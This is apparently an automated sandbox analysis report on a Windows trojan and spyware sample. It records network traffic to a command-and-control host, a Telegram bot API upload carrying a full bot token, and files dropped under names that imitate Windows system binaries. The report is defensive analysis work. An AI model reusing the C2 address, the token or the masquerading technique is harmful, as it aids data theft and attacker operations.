                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1776Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 586580cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: 586580cm.renyash.ru
                            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: unknownHTTP traffic detected: POST /bot8039401524:AAFcWGDQGg-hS6lbQGiVB_qWg821-l6LJqk/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="46d320d3-5b85-4524-9efd-7dcb6d562ef6"Host: api.telegram.orgContent-Length: 104711Expect: 100-continueConnection: Keep-Alive
                            Source: powershell.exe, 00000020.00000002.3616080866.00000207287C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros_%
                            Source: powershell.exe, 00000022.00000002.2683456773.00000228FF2A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoK
                            Source: svchost.exe, 00000035.00000003.2294093672.00000260F6C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 0000001F.00000002.3614208898.000002CB347D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2424544008.00000228F6D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3442371664.0000019A41208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000020.00000002.3616080866.00000207287C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.co
                            Source: powershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 0000001F.00000002.2270217837.000002CB24989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6EE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A313B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2117240064.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2270217837.000002CB24761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A31191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABAB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000001F.00000002.2270217837.000002CB24989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6EE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A313B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABCD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 0000001F.00000002.2270217837.000002CB24761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2267127141.0000020710461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2192004223.00000228E6CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2262803738.0000019A31191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2267830088.0000016AABAB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289909271.0000018013731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2117112709.0000000002722000.00000002.00000001.01000000.00000000.sdmp, maoHSLGQ.log.0.drString found in binary or memory: https://api.telegram.org/bot
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: svchost.exe, 00000035.00000003.2294093672.00000260F6C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                            Source: svchost.exe, 00000035.00000003.2294093672.00000260F6C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: powershell.exe, 00000028.00000002.2289909271.0000018013958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2117112709.0000000002722000.00000002.00000001.01000000.00000000.sdmp, maoHSLGQ.log.0.drString found in binary or memory: https://ipinfo.io/country
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2117112709.0000000002722000.00000002.00000001.01000000.00000000.sdmp, maoHSLGQ.log.0.drString found in binary or memory: https://ipinfo.io/ip
                            Source: powershell.exe, 0000001F.00000002.3614208898.000002CB347D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2424544008.00000228F6D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3442371664.0000019A41208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3579739859.0000016ABBB28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: ZqKQ2F4I1i.51.dr, wdVnR3WgKr.51.dr, 5M1rxeegP9.51.dr, FpFMVzvdtC.51.dr, h1W9W3C8dG.51.dr, Ukz0wVMxpE.51.dr, iL8iX8JrCt.51.dr, fUs1TGVwBD.51.dr, n0vGtRDvKh.51.dr, uQ5ZeHVkzs.51.dr, 5qSNcXdXyw.51.dr, 6OqVKuQ8yy.51.dr, iwqb6OoQvQ.51.dr, ACltLP4OsE.51.dr, OhKSbDJfIh.51.dr, vHVnGvi8SJ.51.dr, x5gHItlIe4.51.dr, RhdavfjrXZ.51.dr, janBlKyTOR.51.dr, 2a0x1GcGhd.51.dr, yfTJcYDXjY.51.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49947 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49963 version: TLS 1.2
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exeJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\SystemTemp\Crashpad\reports\46422b70bfe73bJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\6dd19aba3e2428Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMPJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF848F30D480_2_00007FF848F30D48
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF848F30E430_2_00007FF848F30E43
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF8493201200_2_00007FF849320120
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF8493366320_2_00007FF849336632
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF84932B75D0_2_00007FF84932B75D
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF8493298000_2_00007FF849329800
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeCode function: 0_2_00007FF8493358860_2_00007FF849335886
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeCode function: 52_2_00007FF848F10D4852_2_00007FF848F10D48
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeCode function: 52_2_00007FF848F10E4352_2_00007FF848F10E43
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F10D4855_2_00007FF848F10D48
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F10E4355_2_00007FF848F10E43
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F4114155_2_00007FF848F41141
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F4CEEC55_2_00007FF848F4CEEC
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F4117555_2_00007FF848F41175
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeCode function: 55_2_00007FF848F2098655_2_00007FF848F20986
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BQKoNvFu.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                            Source: XMmLkVMA.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: EnQNlhbf.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: wJHXBnLy.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: DHvXeCGn.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: MvRfNUhf.log.51.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: BQKoNvFu.log.51.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: cflUKPKy.log.51.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: HJnNqbKj.log.51.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2174682690.000000001B0B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2174682690.000000001B0B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 00000000.00000002.2117112709.0000000002722000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 00000000.00000000.2053026799.00000000002B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 0000002F.00000002.3121794239.000000000289C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 0000002F.00000002.3121794239.00000000027E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 0000002F.00000002.3121794239.0000000002821000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 0000002F.00000002.3121794239.00000000027D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 00000030.00000002.3073574902.0000000003021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exe, 00000030.00000002.3073574902.0000000003071000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Udzp7lL5ns.exe
                            Source: Udzp7lL5ns.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: Udzp7lL5ns.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ApplicationFrameHost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: LaHYItspByFGQiJUMBgDGadp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Memory Compression.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: LaHYItspByFGQiJUMBgDGadp.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@52/324@3/4
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Program Files (x86)\windows mail\Memory Compression.exeJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\Desktop\XMmLkVMA.logJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:748:120:WilError_03
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-hpwtvZpgP5Ms2jfyINnC
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile created: C:\Users\user\AppData\Local\Temp\2jonksckJump to behavior
